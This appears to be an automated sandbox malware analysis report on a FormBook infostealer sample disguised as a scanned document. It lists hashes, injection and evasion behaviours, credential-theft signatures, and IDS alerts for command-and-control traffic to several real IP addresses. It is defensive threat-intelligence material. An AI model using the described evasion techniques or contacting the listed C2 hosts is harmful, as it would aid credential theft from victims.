Edit tour

Windows Analysis Report
rHP_SCAN_DOCUME.exe

Overview

General Information

Sample name:	rHP_SCAN_DOCUME.exe
Analysis ID:	1584837
MD5:	fa2ead992ba2ac05214b3f586a3257bf
SHA1:	ebacda0e78fc4e856fbcbf2e94067b61654ced1f
SHA256:	06045928b7cc9bd969382bd3f473a1b0c8f8996adc0dd5c0d10dc28311f5212d
Tags:	exeuser-Porcupine
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

rHP_SCAN_DOCUME.exe (PID: 3652 cmdline: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe" MD5: FA2EAD992BA2AC05214B3F586A3257BF)

svchost.exe (PID: 4260 cmdline: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

CdarBkjFTHWBQ.exe (PID: 5428 cmdline: "C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

w32tm.exe (PID: 6200 cmdline: "C:\Windows\SysWOW64\w32tm.exe" MD5: E55B6A057FDDD35A7380FB2C6811A8EC)

CdarBkjFTHWBQ.exe (PID: 2856 cmdline: "C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4424 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1635374918.00000000036D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3921258002.00000000038A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3921287950.0000000003320000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3910307561.0000000002E60000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1634925117.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3923632422.00000000051D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1635925426.0000000004800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3921356109.0000000003370000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe", CommandLine: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe", ParentImage: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe, ParentProcessId: 3652, ParentProcessName: rHP_SCAN_DOCUME.exe, ProcessCommandLine: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe", ProcessId: 4260, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe", CommandLine: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe", ParentImage: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe, ParentProcessId: 3652, ParentProcessName: rHP_SCAN_DOCUME.exe, ProcessCommandLine: "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe", ProcessId: 4260, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T16:02:38.855871+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60141	217.160.0.160	80	TCP
2025-01-06T16:03:02.082260+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60145	199.59.243.228	80	TCP
2025-01-06T16:03:23.481056+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60156	104.21.13.141	80	TCP
2025-01-06T16:03:37.960109+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60248	15.197.240.20	80	TCP
2025-01-06T16:03:51.335933+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60346	136.243.225.5	80	TCP
2025-01-06T16:04:04.751975+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60430	172.67.182.198	80	TCP
2025-01-06T16:04:18.080447+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60434	199.192.21.169	80	TCP
2025-01-06T16:04:32.005071+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60438	45.130.41.107	80	TCP
2025-01-06T16:04:45.649623+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60442	85.159.66.93	80	TCP
2025-01-06T16:04:58.888041+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60446	199.59.243.228	80	TCP
2025-01-06T16:05:33.412801+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60450	38.22.89.164	80	TCP
2025-01-06T16:05:48.793277+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	60454	68.65.122.71	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T16:02:38.855871+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60141	217.160.0.160	80	TCP
2025-01-06T16:03:02.082260+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60145	199.59.243.228	80	TCP
2025-01-06T16:03:23.481056+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60156	104.21.13.141	80	TCP
2025-01-06T16:03:37.960109+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60248	15.197.240.20	80	TCP
2025-01-06T16:03:51.335933+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60346	136.243.225.5	80	TCP
2025-01-06T16:04:04.751975+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60430	172.67.182.198	80	TCP
2025-01-06T16:04:18.080447+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60434	199.192.21.169	80	TCP
2025-01-06T16:04:32.005071+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60438	45.130.41.107	80	TCP
2025-01-06T16:04:45.649623+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60442	85.159.66.93	80	TCP
2025-01-06T16:04:58.888041+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60446	199.59.243.228	80	TCP
2025-01-06T16:05:33.412801+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60450	38.22.89.164	80	TCP
2025-01-06T16:05:48.793277+0100	2855465	1	A Network Trojan was detected	192.168.2.8	60454	68.65.122.71	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T16:02:54.443737+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60142	199.59.243.228	80	TCP
2025-01-06T16:02:57.007833+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60143	199.59.243.228	80	TCP
2025-01-06T16:02:59.576753+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60144	199.59.243.228	80	TCP
2025-01-06T16:03:15.780693+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60147	104.21.13.141	80	TCP
2025-01-06T16:03:18.384999+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60148	104.21.13.141	80	TCP
2025-01-06T16:03:20.889056+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60149	104.21.13.141	80	TCP
2025-01-06T16:03:29.254981+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60199	15.197.240.20	80	TCP
2025-01-06T16:03:31.804484+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60215	15.197.240.20	80	TCP
2025-01-06T16:03:34.387317+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60231	15.197.240.20	80	TCP
2025-01-06T16:03:43.690598+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60293	136.243.225.5	80	TCP
2025-01-06T16:03:46.239029+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60310	136.243.225.5	80	TCP
2025-01-06T16:03:48.790208+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60330	136.243.225.5	80	TCP
2025-01-06T16:03:57.100995+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60379	172.67.182.198	80	TCP
2025-01-06T16:03:59.671100+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60394	172.67.182.198	80	TCP
2025-01-06T16:04:02.225545+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60413	172.67.182.198	80	TCP
2025-01-06T16:04:10.405845+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60431	199.192.21.169	80	TCP
2025-01-06T16:04:13.021602+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60432	199.192.21.169	80	TCP
2025-01-06T16:04:15.501010+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60433	199.192.21.169	80	TCP
2025-01-06T16:04:24.857851+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60435	45.130.41.107	80	TCP
2025-01-06T16:04:27.227418+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60436	45.130.41.107	80	TCP
2025-01-06T16:04:29.934947+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60437	45.130.41.107	80	TCP
2025-01-06T16:04:38.813868+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60439	85.159.66.93	80	TCP
2025-01-06T16:04:41.357721+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60440	85.159.66.93	80	TCP
2025-01-06T16:04:43.904589+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60441	85.159.66.93	80	TCP
2025-01-06T16:04:51.212237+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60443	199.59.243.228	80	TCP
2025-01-06T16:04:53.765681+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60444	199.59.243.228	80	TCP
2025-01-06T16:04:56.318439+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60445	199.59.243.228	80	TCP
2025-01-06T16:05:05.873480+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60447	38.22.89.164	80	TCP
2025-01-06T16:05:08.423622+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60448	38.22.89.164	80	TCP
2025-01-06T16:05:10.969586+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60449	38.22.89.164	80	TCP
2025-01-06T16:05:39.983139+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60451	68.65.122.71	80	TCP
2025-01-06T16:05:42.530051+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60452	68.65.122.71	80	TCP
2025-01-06T16:05:45.077256+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60453	68.65.122.71	80	TCP
2025-01-06T16:06:12.920021+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60455	103.174.136.137	80	TCP
2025-01-06T16:06:16.978508+0100	2855464	1	A Network Trojan was detected	192.168.2.8	60456	103.174.136.137	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: rHP_SCAN_DOCUME.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: rHP_SCAN_DOCUME.exe	Virustotal: Detection: 30%			Perma Link
Source: rHP_SCAN_DOCUME.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1635374918.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3921258002.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3921287950.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3910307561.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1634925117.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3923632422.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1635925426.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3921356109.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rHP_SCAN_DOCUME.exe

Joe Sandbox ML: detected

Source: rHP_SCAN_DOCUME.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: w32tm.pdb source: svchost.exe, 00000002.00000003.1602100399.0000000003241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1601320456.000000000322C000.00000004.00000020.00020000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000003.00000002.3915169148.0000000001128000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CdarBkjFTHWBQ.exe, 00000003.00000000.1558648582.0000000000F7E000.00000002.00000001.01000000.00000004.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000000.1705240217.0000000000F7E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: rHP_SCAN_DOCUME.exe, 00000000.00000003.1459098048.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, rHP_SCAN_DOCUME.exe, 00000000.00000003.1459341814.0000000003820000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1635421646.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1538445133.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1635421646.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1536515595.0000000003400000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000003.1635272552.000000000320C000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3921835115.0000000003560000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3921835115.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000004.00000003.1637760556.00000000033BA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rHP_SCAN_DOCUME.exe, 00000000.00000003.1459098048.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, rHP_SCAN_DOCUME.exe, 00000000.00000003.1459341814.0000000003820000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1635421646.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1538445133.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1635421646.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1536515595.0000000003400000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 00000004.00000003.1635272552.000000000320C000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3921835115.0000000003560000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3921835115.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000004.00000003.1637760556.00000000033BA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: w32tm.exe, 00000004.00000002.3911116744.0000000002F24000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3923068718.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1937137809.000000001BB9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: w32tm.exe, 00000004.00000002.3911116744.0000000002F24000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3923068718.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1937137809.000000001BB9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: w32tm.pdbGCTL source: svchost.exe, 00000002.00000003.1602100399.0000000003241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1601320456.000000000322C000.00000004.00000020.00020000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000003.00000002.3915169148.0000000001128000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0084C2A2 FindFirstFileExW,	0_2_0084C2A2
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008868EE FindFirstFileW,FindClose,	0_2_008868EE
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0088698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0088698F
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0087D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0087D076
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0087D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0087D3A9
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00889642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00889642
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0088979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0088979D
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0087DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0087DBBE
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00889B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00889B2B
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00885C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00885C97
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E7CAA0 FindFirstFileW,FindNextFileW,FindClose,	4_2_02E7CAA0

Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4x nop then xor eax, eax		4_2_02E69E50
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_034704D8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60141 -> 217.160.0.160:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60141 -> 217.160.0.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60144 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60143 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60148 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60142 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60156 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60156 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60149 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60199 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60248 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60248 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60231 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60293 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60310 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60330 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60145 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60145 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60346 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60346 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60147 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60379 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60394 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60430 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60430 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60413 -> 172.67.182.198:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60434 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60434 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60431 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60433 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60439 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60435 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60444 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60432 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60438 -> 45.130.41.107:80
